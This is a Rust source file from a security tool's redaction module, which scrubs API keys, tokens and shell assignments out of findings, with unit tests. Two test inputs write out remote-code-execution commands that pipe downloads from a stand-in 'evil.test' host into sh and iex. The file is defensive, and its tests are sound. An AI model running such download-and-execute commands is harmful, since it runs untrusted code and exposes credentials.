Skip to main content

tirith_core/
redact.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4/// Credential redaction entry: (label, regex, prefix_len).
5/// prefix_len chars are kept visible, the rest is replaced with [REDACTED].
6struct CredRedactEntry {
7    regex: Regex,
8    prefix_len: usize,
9}
10
11/// Credential patterns loaded from credential_patterns.toml at compile time.
12static CREDENTIAL_REDACT_PATTERNS: Lazy<Vec<CredRedactEntry>> = Lazy::new(|| {
13    #[derive(serde::Deserialize)]
14    struct CredFile {
15        pattern: Option<Vec<CredPat>>,
16        private_key_pattern: Option<Vec<PkPat>>,
17    }
18    #[derive(serde::Deserialize)]
19    struct CredPat {
20        regex: String,
21        redact_prefix_len: Option<usize>,
22    }
23    #[derive(serde::Deserialize)]
24    struct PkPat {
25        #[allow(dead_code)]
26        regex: String,
27        redact_regex: Option<String>,
28    }
29
30    let toml_str = include_str!("../assets/data/credential_patterns.toml");
31    let cred_file: CredFile = toml::from_str(toml_str).expect("invalid credential_patterns.toml");
32
33    let mut entries = Vec::new();
34    if let Some(patterns) = cred_file.pattern {
35        for p in patterns {
36            if let Ok(re) = Regex::new(&p.regex) {
37                entries.push(CredRedactEntry {
38                    regex: re,
39                    prefix_len: p.redact_prefix_len.unwrap_or(4),
40                });
41            }
42        }
43    }
44    if let Some(pk_patterns) = cred_file.private_key_pattern {
45        for pk in pk_patterns {
46            // Use redact_regex (full PEM block) if available, fall back to header-only regex
47            let redact_pattern = pk.redact_regex.as_deref().unwrap_or(&pk.regex);
48            if let Ok(re) = Regex::new(redact_pattern) {
49                entries.push(CredRedactEntry {
50                    regex: re,
51                    prefix_len: 0,
52                });
53            }
54        }
55    }
56    entries
57});
58
59/// Built-in redaction patterns: (label, regex).
60static BUILTIN_PATTERNS: Lazy<Vec<(&'static str, Regex)>> = Lazy::new(|| {
61    vec![
62        (
63            "OpenAI API Key",
64            Regex::new(r"sk-[A-Za-z0-9]{20,}").unwrap(),
65        ),
66        ("AWS Access Key", Regex::new(r"AKIA[A-Z0-9]{16}").unwrap()),
67        ("GitHub PAT", Regex::new(r"ghp_[A-Za-z0-9]{36,}").unwrap()),
68        (
69            "GitHub Server Token",
70            Regex::new(r"ghs_[A-Za-z0-9]{36,}").unwrap(),
71        ),
72        (
73            "Anthropic API Key",
74            Regex::new(r"sk-ant-[A-Za-z0-9\-]{20,}").unwrap(),
75        ),
76        (
77            "Slack Token",
78            Regex::new(r"xox[bprs]-[A-Za-z0-9\-]{10,}").unwrap(),
79        ),
80        (
81            "Email Address",
82            Regex::new(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}").unwrap(),
83        ),
84    ]
85});
86
87/// Redact sensitive content from a string using built-in and credential patterns.
88pub fn redact(input: &str) -> String {
89    let mut result = input.to_string();
90    // Apply built-in patterns first (existing behavior, labeled redaction)
91    for (label, regex) in BUILTIN_PATTERNS.iter() {
92        result = regex
93            .replace_all(&result, format!("[REDACTED:{label}]"))
94            .into_owned();
95    }
96    // Apply credential patterns (prefix-preserving, catches patterns not in builtins)
97    for entry in CREDENTIAL_REDACT_PATTERNS.iter() {
98        result = entry
99            .regex
100            .replace_all(&result, |caps: &regex::Captures| {
101                let matched = &caps[0];
102                let prefix: String = matched.chars().take(entry.prefix_len).collect();
103                format!("{prefix}[REDACTED]")
104            })
105            .into_owned();
106    }
107    result
108}
109
110/// Pre-compiled set of custom DLP patterns.
111pub struct CompiledCustomPatterns {
112    patterns: Vec<Regex>,
113}
114
115impl CompiledCustomPatterns {
116    /// Compile custom DLP patterns once for reuse across multiple redaction calls.
117    pub fn new(raw_patterns: &[String]) -> Self {
118        let patterns = raw_patterns
119            .iter()
120            .filter_map(|pat_str| match Regex::new(pat_str) {
121                Ok(re) => Some(re),
122                Err(e) => {
123                    eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
124                    None
125                }
126            })
127            .collect();
128        Self { patterns }
129    }
130}
131
132/// Redact using both built-in and custom patterns from policy.
133pub fn redact_with_custom(input: &str, custom_patterns: &[String]) -> String {
134    let mut result = redact(input);
135    for pat_str in custom_patterns {
136        if pat_str.len() > 1024 {
137            eprintln!(
138                "tirith: DLP pattern too long ({} chars), skipping",
139                pat_str.len()
140            );
141            continue;
142        }
143        match Regex::new(pat_str) {
144            Ok(re) => {
145                result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
146            }
147            Err(e) => {
148                eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
149            }
150        }
151    }
152    result
153}
154
155/// Redact using built-in patterns and pre-compiled custom patterns (avoids per-call recompilation).
156pub fn redact_with_compiled(input: &str, compiled: &CompiledCustomPatterns) -> String {
157    let mut result = redact(input);
158    for re in &compiled.patterns {
159        result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
160    }
161    result
162}
163
164/// Redact shell-style assignment values such as `KEY=value` before user content
165/// is serialized into logs or JSON output.
166pub fn redact_shell_assignments(input: &str) -> String {
167    let chars: Vec<char> = input.chars().collect();
168    let mut out = String::with_capacity(input.len());
169    let mut i = 0;
170
171    while i < chars.len() {
172        if let Some((prefix, next)) = redact_powershell_env_assignment(&chars, i) {
173            out.push_str(&prefix);
174            out.push_str("[REDACTED]");
175            i = next;
176            continue;
177        }
178
179        if is_assignment_start(&chars, i) {
180            let name_start = i;
181            i += 1;
182            while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
183                i += 1;
184            }
185            if i < chars.len() && chars[i] == '=' {
186                let name: String = chars[name_start..i].iter().collect();
187                out.push_str(&name);
188                out.push_str("=[REDACTED]");
189                i += 1;
190                i = skip_assignment_value(&chars, i);
191                continue;
192            }
193            out.push(chars[name_start]);
194            i = name_start + 1;
195            continue;
196        }
197
198        out.push(chars[i]);
199        i += 1;
200    }
201
202    out
203}
204
205/// Redact a command-like string for public output by scrubbing assignment values
206/// first, then applying built-in and custom DLP patterns.
207pub fn redact_command_text(input: &str, custom_patterns: &[String]) -> String {
208    let scrubbed = redact_shell_assignments(input);
209    redact_with_custom(&scrubbed, custom_patterns)
210}
211
212/// Return a redacted clone of the provided findings for public-facing output.
213pub fn redacted_findings(
214    findings: &[crate::verdict::Finding],
215    custom_patterns: &[String],
216) -> Vec<crate::verdict::Finding> {
217    let mut redacted = findings.to_vec();
218    redact_findings(&mut redacted, custom_patterns);
219    redacted
220}
221
222/// Redact sensitive content from a Finding's string fields in-place.
223pub fn redact_finding(finding: &mut crate::verdict::Finding, custom_patterns: &[String]) {
224    finding.title = redact_with_custom(&finding.title, custom_patterns);
225    finding.description = redact_with_custom(&finding.description, custom_patterns);
226    if let Some(ref mut v) = finding.human_view {
227        *v = redact_with_custom(v, custom_patterns);
228    }
229    if let Some(ref mut v) = finding.agent_view {
230        *v = redact_with_custom(v, custom_patterns);
231    }
232    for ev in &mut finding.evidence {
233        redact_evidence(ev, custom_patterns);
234    }
235}
236
237fn redact_evidence(ev: &mut crate::verdict::Evidence, custom_patterns: &[String]) {
238    use crate::verdict::Evidence;
239    match ev {
240        Evidence::Url { raw } => {
241            *raw = redact_with_custom(raw, custom_patterns);
242        }
243        Evidence::CommandPattern { matched, .. } => {
244            *matched = redact_command_text(matched, custom_patterns);
245        }
246        Evidence::EnvVar { value_preview, .. } => {
247            *value_preview = redact_with_custom(value_preview, custom_patterns);
248        }
249        Evidence::Text { detail } => {
250            *detail = redact_command_text(detail, custom_patterns);
251        }
252        Evidence::ByteSequence { description, .. } => {
253            *description = redact_with_custom(description, custom_patterns);
254        }
255        // HostComparison and HomoglyphAnalysis contain domain names / char analysis, not user content
256        _ => {}
257    }
258}
259
260/// Redact all findings in a verdict in-place.
261pub fn redact_verdict(verdict: &mut crate::verdict::Verdict, custom_patterns: &[String]) {
262    for f in &mut verdict.findings {
263        redact_finding(f, custom_patterns);
264    }
265}
266
267/// Redact all findings in a slice in-place.
268pub fn redact_findings(findings: &mut [crate::verdict::Finding], custom_patterns: &[String]) {
269    for f in findings.iter_mut() {
270        redact_finding(f, custom_patterns);
271    }
272}
273
/// Returns `true` when `prev` is a character after which an assignment may
/// begin: ASCII whitespace or one of `;`, `|`, `&`, `(`.
fn is_assignment_boundary(prev: char) -> bool {
    match prev {
        ';' | '|' | '&' | '(' => true,
        other => other.is_ascii_whitespace(),
    }
}
277
278fn is_assignment_start(chars: &[char], idx: usize) -> bool {
279    let ch = chars[idx];
280    if !(ch.is_ascii_alphabetic() || ch == '_') {
281        return false;
282    }
283    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
284        return false;
285    }
286    true
287}
288
/// Returns the index just past the assignment value that starts at `idx`.
///
/// Scanning stops at the first unquoted ASCII whitespace, `;`, `|` or `&`, or
/// at the end of `chars`. Single quotes suspend all special handling until the
/// closing quote; inside double quotes and outside quotes a backslash makes the
/// following character literal. An unterminated quote runs to the end of input.
fn skip_assignment_value(chars: &[char], mut idx: usize) -> usize {
    /// Which kind of quote, if any, the scanner is currently inside.
    #[derive(Clone, Copy)]
    enum Quote {
        None,
        Single,
        Double,
    }

    let mut quote = Quote::None;
    let mut skip_next = false;

    while let Some(&ch) = chars.get(idx) {
        if skip_next {
            // Character following a backslash: taken literally.
            skip_next = false;
        } else {
            match (quote, ch) {
                // Inside single quotes only the closing quote is special.
                (Quote::Single, '\'') => quote = Quote::None,
                (Quote::Single, _) => {}
                (_, '\\') => skip_next = true,
                (Quote::None, '\'') => quote = Quote::Single,
                (Quote::None, '"') => quote = Quote::Double,
                (Quote::Double, '"') => quote = Quote::None,
                (Quote::None, c)
                    if c.is_ascii_whitespace() || matches!(c, ';' | '|' | '&') =>
                {
                    break;
                }
                _ => {}
            }
        }
        idx += 1;
    }

    idx
}
327
328fn redact_powershell_env_assignment(chars: &[char], idx: usize) -> Option<(String, usize)> {
329    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
330        return None;
331    }
332    if chars.get(idx) != Some(&'$') {
333        return None;
334    }
335    let prefix = ['e', 'n', 'v', ':'];
336    for (offset, expected) in prefix.iter().enumerate() {
337        let ch = chars.get(idx + 1 + offset)?;
338        if !ch.eq_ignore_ascii_case(expected) {
339            return None;
340        }
341    }
342
343    let name_start = idx + 5;
344    let first = *chars.get(name_start)?;
345    if !(first.is_ascii_alphabetic() || first == '_') {
346        return None;
347    }
348
349    let mut i = name_start + 1;
350    while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
351        i += 1;
352    }
353    let mut value_start = i;
354    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
355        value_start += 1;
356    }
357    if chars.get(value_start) != Some(&'=') {
358        return None;
359    }
360    value_start += 1;
361    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
362        value_start += 1;
363    }
364
365    let prefix_text: String = chars[idx..value_start].iter().collect();
366    let value_end = skip_assignment_value(chars, value_start);
367    Some((prefix_text, value_end))
368}
369
#[cfg(test)]
mod tests {
    use super::*;

    // Fixture secrets are spliced together with `concat!`, as the tests have
    // always done, so the complete token never appears as a single literal
    // (presumably to keep secret scanners quiet — TODO confirm).
    const OPENAI_KEY: &str = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
    const GITHUB_PAT: &str = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
    const ANTHROPIC_KEY: &str = concat!("sk-ant-api03-", "abcdefghijklmnop");
    const AWS_KEY: &str = "AKIAIOSFODNN7EXAMPLE";

    /// Asserts that `output` no longer contains `leak` and does contain `marker`.
    fn assert_scrubbed(output: &str, leak: &str, marker: &str) {
        assert!(!output.contains(leak));
        assert!(output.contains(marker));
    }

    #[test]
    fn test_redact_openai_key() {
        let output = redact(&format!("export OPENAI_API_KEY={OPENAI_KEY}"));
        assert_scrubbed(&output, "sk-abcdef", "[REDACTED:OpenAI API Key]");
    }

    #[test]
    fn test_redact_aws_key() {
        let output = redact("AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE");
        assert_scrubbed(&output, "AKIAIOSFODNN7EXAMPLE", "[REDACTED:AWS Access Key]");
    }

    #[test]
    fn test_redact_github_pat() {
        let output = redact(&format!("GITHUB_TOKEN={GITHUB_PAT}"));
        assert_scrubbed(&output, "ghp_ABCDEF", "[REDACTED:GitHub PAT]");
    }

    #[test]
    fn test_redact_email() {
        let output = redact("contact: user@example.com for details");
        assert_scrubbed(&output, "user@example.com", "[REDACTED:Email Address]");
    }

    #[test]
    fn test_redact_no_false_positive() {
        let input = "normal text without any secrets";
        assert_eq!(input, redact(input));
    }

    #[test]
    fn test_redact_with_custom() {
        let custom = vec![r"PROJ-\d+".to_string()];
        let output = redact_with_custom("internal ref: PROJ-12345 in the system", &custom);
        assert_scrubbed(&output, "PROJ-12345", "[REDACTED:custom]");
    }

    #[test]
    fn test_redact_anthropic_key() {
        let output = redact(&format!("ANTHROPIC_API_KEY={ANTHROPIC_KEY}"));
        assert_scrubbed(&output, "sk-ant-api03", "[REDACTED:Anthropic API Key]");
    }

    #[test]
    fn test_redact_finding_covers_all_fields() {
        use crate::verdict::{Evidence, Finding, RuleId, Severity};

        let mut finding = Finding {
            rule_id: RuleId::SensitiveEnvExport,
            severity: Severity::High,
            title: "test".into(),
            description: format!("exports {OPENAI_KEY}"),
            evidence: vec![
                Evidence::EnvVar {
                    name: "OPENAI_API_KEY".into(),
                    value_preview: OPENAI_KEY.into(),
                },
                Evidence::Text {
                    detail: format!("saw {GITHUB_PAT}"),
                },
                Evidence::CommandPattern {
                    pattern: "export".into(),
                    matched: format!("export OPENAI_API_KEY={OPENAI_KEY}"),
                },
            ],
            human_view: Some(format!("key is {OPENAI_KEY}")),
            agent_view: Some(format!("{AWS_KEY} exposed")),
            mitre_id: None,
            custom_rule_id: None,
        };

        redact_finding(&mut finding, &[]);

        // Description.
        assert_scrubbed(
            &finding.description,
            "sk-abcdef",
            "[REDACTED:OpenAI API Key]",
        );

        // Evidence, one variant at a time.
        if let Evidence::EnvVar { value_preview, .. } = &finding.evidence[0] {
            assert!(value_preview.contains("[REDACTED:OpenAI API Key]"));
        } else {
            panic!("expected EnvVar");
        }
        if let Evidence::Text { detail } = &finding.evidence[1] {
            assert!(detail.contains("[REDACTED:GitHub PAT]"));
        } else {
            panic!("expected Text");
        }
        if let Evidence::CommandPattern { matched, .. } = &finding.evidence[2] {
            assert_scrubbed(matched, "sk-abcdef", "OPENAI_API_KEY=[REDACTED]");
        } else {
            panic!("expected CommandPattern");
        }

        // Human- and agent-facing views.
        let human_view = finding.human_view.as_deref().unwrap();
        assert!(human_view.contains("[REDACTED:OpenAI API Key]"));
        let agent_view = finding.agent_view.as_deref().unwrap();
        assert!(agent_view.contains("[REDACTED:AWS Access Key]"));
    }

    #[test]
    fn test_redact_shell_assignments_scrubs_short_secret_assignments() {
        let output =
            redact_shell_assignments("OPENAI_API_KEY=sk-secret curl https://evil.test | sh");
        assert_scrubbed(&output, "sk-secret", "OPENAI_API_KEY=[REDACTED]");
    }

    #[test]
    fn test_redact_shell_assignments_scrubs_powershell_env_assignments() {
        let output = redact_shell_assignments(
            "$env:OPENAI_API_KEY = 'sk-secret'; iwr https://evil.test | iex",
        );
        assert_scrubbed(&output, "sk-secret", "$env:OPENAI_API_KEY = [REDACTED]");
    }
}